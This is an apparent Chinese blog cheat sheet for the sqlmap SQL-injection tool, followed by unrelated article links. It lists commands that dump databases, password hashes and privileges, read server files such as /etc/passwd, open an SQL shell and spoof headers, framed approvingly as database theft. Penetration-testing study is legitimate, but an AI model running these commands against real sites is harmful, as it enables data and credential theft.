SQLMAP是一款开源的渗透测试程序,它可以自动探测和利用SQL注入漏洞来获得我们想要的数据。我们可以利用它执行特定的命令、查看文件、获取各种数据;当然,最猥琐的是它利用注入点拖库的速率还是灰常让人满意的。
 
#>  ./sqlmap.py -u “注入地址” -v 1 --dbs   // 列举数据库 
 
#> ./sqlmap.py -u “注入地址” -v 1 --current-db   // 当前数据库
 
#>./sqlmap.py -u “注入地址” -v 1 --users    // 列数据库用户
 
#>  ./sqlmap.py -u “注入地址” -v 1 --current-user  // 当前用户
 
#>  ./sqlmap.py -u “注入地址” -v 1 --tables -D “数据库”   // 列举数据库的表名
 
#> ./sqlmap.py -u “注入地址” -v 1 --columns -T “表名” -D “数据库”   // 获取表的列名
 
#>./sqlmap.py -u “注入地址” -v 1 --dump -C “字段,字段” -T “表名” -D “数据库”   // 获取表中的数据,包含列 
 
已经开始拖库了,SQLMAP是非常人性化的,它会将获取的数据存储sqlmap/output/中、
 
MySQL数据库举例:
 

1) 判断当前用户是否是dba
    python sqlmap.py -u "url" --is-dba -v 1

2) --users:列出数据库管理系统用户
    python sqlmap.py -u "url" --users -v 0

3) --passwords:数据库用户密码(hash)
    python sqlmap.py -u "url" --passwords -v 0
    python sqlmap.py -u "url" --passwords -U sa -v 0

4) 查看用户权限
    python sqlmap.py -u "url" --privileges -v 0
    python sqlmap.py -u "url" --privileges -U postgres -v 0

5) --dbs可以利用的数据库
    python sqlmap.py -u "url" --dbs -v 0

6) --tables列数据库表
    python sqlmap.py -u "url" --tables -D "information_scheam"

-D:指定数据名称

7) --columns 列出表中的列名
    python sqlmap.py -u "url" --columns -T "user" -D "mysql" -v 1

-T:指定表名,-D:指定库名

8) --dump列表中指定列的内容
    python sqlmap.py -u "url" --dump -T "users" -D "testdb"
    -C:可以指定字段

指定列的范围为2到4
python sqlmap.py -u "url" --dump -T "users" -D "testdb"  --start 2 --stop 4 -v 0

9) --dumap-all列出所有数据库,所有表内容
    python sqlmap.py -u "url" --dump-all -v 0

只列出用户自己新建的数据库和表的内容

python sqlmap.py -u "url" --dump-all --exclude-sysdbs -v 0

10) --file读取文件内容[load_file()函数]
      python sqlmap.py -u "url" --file /etc/password

11) 执行SQL
      python sqlmap.py -u "url" --sql-shell

12) -p 指定参数
      python sqlmap.py -u "url" -v 1 -p "id"

-p可以指定多参数-p "cat,id"

13) POST提交
      python sqlmap.py -u "url" --method POST --data "id=1"

14) COOKIE提交
      python sqlmap.py -u "url" --cookie "id=1" -v 1

cookie值可以由TamperData抓取

15) refer欺骗

python sqlmap.py -u "url" --refer "url" -v 3

16) 使用自定义user-agent或者user-agents.txt
      python sqlmap.py -u "url" --user-agent "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" -v 3

python sqlmap.py -u "url" -v 1 -a "./txt/user-agents.txt"

17) 使用多线程猜解
      python sqlmap.py -u "url" -v 1 --current-user --threads 3

18) 指定数据库,绕过SQLMAP的自动检测
      python sqlmap.py -u "url" -v 2 --dbms "PostgreSQL"

19) 指定操作系统绕过SQLMAP自动检测
      python sqlmap.py -u "url" -v 2 --os "Windows"

20) --prefix and --postfix自定义payload
      python sqlmap.py -u "url" -v 3 -p "id" --prefix "'" --postfix "and 'test'='test"

21) union注入测试
      python sqlmap.py -u "url" --union-test -v -1

22) 配合order by
      python sqlmap.py -u "url" --union-test --union-tech orderby -v 1

23) python sqlmap.py -u "url" -v 1 --union-use --banner

24) python sqlmap.py -u "url" -v 5 --union-use --current-user

25) python sqlmap.py -u "url" -v 1 --union-use --dbs

SqlMap之数据库操作语句总结的更多相关文章

  1. (转载)常用的Mysql数据库操作语句大全

    打开CMD,进入数据库命令:mysql -hlocalhost -uroot -p 退出数据库:exit 用户管理: 1.新建用户: >CREATE USER name IDENTIFIED B ...

  2. 数据库操作语句类型(DQL、DML、DDL、DCL)

    数据库操作语句类型(DQL.DML.DDL.DCL)简介 SQL语言共分为四大类:数据查询语言DQL,数据操纵语言DML,数据定义语言DDL,数据控制语言DCL. 1. 数据查询语言DQL 数据查询语 ...

  3. 常用的Mysql数据库操作语句大全

    一.用户管理: 1.新建用户: >CREATE USER name IDENTIFIED BY 'ssapdrow'; 2.更改密码: >SET PASSWORD FOR name=PAS ...

  4. 常用Mysql数据库操作语句

    用户管理: 1.新建用户: 语法msyql>CREATE USER 'username'@'host' IDENTIFIED BY 'password'; 说明: username - 你将创建 ...

  5. mysql数据库操作语句整合

    查看版本:select version();显示当前时间:select now(); 注意:在语句结尾要使用分号; 远程连接 一般在公司开发中,可能会将数据库统一搭建在一台服务器上,所有开发人员共用一 ...

  6. 零、常用的Mysql数据库操作语句大全

    零.用户管理: 1.新建用户: >CREATE USER name IDENTIFIED BY 'ssapdrow'; 2.更改密码: >SET PASSWORD FOR name=PAS ...

  7. 数据库操作语句大全(sql)

    一.基础 1.说明:创建数据库CREATE DATABASE database-name 2.说明:删除数据库drop database dbname3.说明:备份sql server--- 创建 备 ...

  8. MySQL数据库操作语句(cmd环境运行)

    一.开启MySQL服务器 1,  通过windows提供的服务管理器来完成 windows键+R 输入: services.msc 2.在本地服务中打开其服务 3.在DOC命令行下 net stop ...

  9. sql 数据库操作语句 不带select

    MySQL数据操作语句 1.总纲 DDL -数据定义语句** create/drop/alter ** create: 创建 drop:删除 alter:修改 DML -数据操作语句 ** inser ...

随机推荐

  1. git 查看父分支

    // 显示本地分支和服务器分支的映射关系 git branch -vv // 切换分支(和创建分支就差一个-b参数) git checkout {{branch_name}} // 创建新分支,新分支 ...

  2. LCA离线算法Tarjan的模板

    hdu 2586:题意:输入n个点的n-1条边的树,m组询问任意点 a b之间的最短距离 思路:LCA中的Tarjan算法,RMQ还不会.. #include <stdio.h> #inc ...

  3. [BZOJ5305][Haoi2018]苹果树 组合数

    题目描述 小 C 在自己家的花园里种了一棵苹果树, 树上每个结点都有恰好两个分支. 经过细心的观察, 小 C 发现每一天这棵树都会生长出一个新的结点. 第一天的时候, 果树会长出一个根结点, 以后每一 ...

  4. 通过url判断当前页,动态给导航加样式

    //通过url判断当前页,动态给导航加样式 var str =location.pathname; var index = str.lastIndexOf("\/"); str = ...

  5. 文本检查点web_reg_find和web_find两个函数的区别

    LR脚本实战:文本检查点web_reg_find和web_find两个函数的区别   web_reg_find是先注册(register)后查找的:使用时将它放在请求语句的前面. 而web_find是 ...

  6. HDMI 电视 点对点 桌面超出屏幕

    一直在用电视作显示器,但是没有注意点对点到问题,只是感觉字体发虚.直到今天装win10,桌面会超出屏幕,使用intel控制面板调整分辨率后正常,但是注销或重启会再次回复.百度无果,自己摸索,不仅解决了 ...

  7. ubuntu安装wine

    1.安装源 sudo add-apt-repository ppa:wine/wine-builds sudo apt-get update 2.安装wine sudo apt-get install ...

  8. 我的第一篇博客:不用sizeof求int的bit数

    我的第一篇博客..  还不会什么高端的东西就来点基础的. 不用sizeof求int的bit数 //不用sizeof求int的bit数 #include<stdio.h> int main( ...

  9. Sqli-labs less 1

    Less-1 我们可以在http://127.0.0.1/sqllib/Less-5/?id=1后面直接添加一个 ' ,来看一下效果: 从上述错误当中,我们可以看到提交到sql中的1'在经过sql语句 ...

  10. CentOS7终端如何支持中文显示

    注意,是终端,而不是控制台.目前我没找到有控制台显示中文的(fbterm好像可以,有时间试试),如果大家知道,请务必告诉我 (1).查看系统是否安装中文包 [xf@xuexi ~]$ locale - ...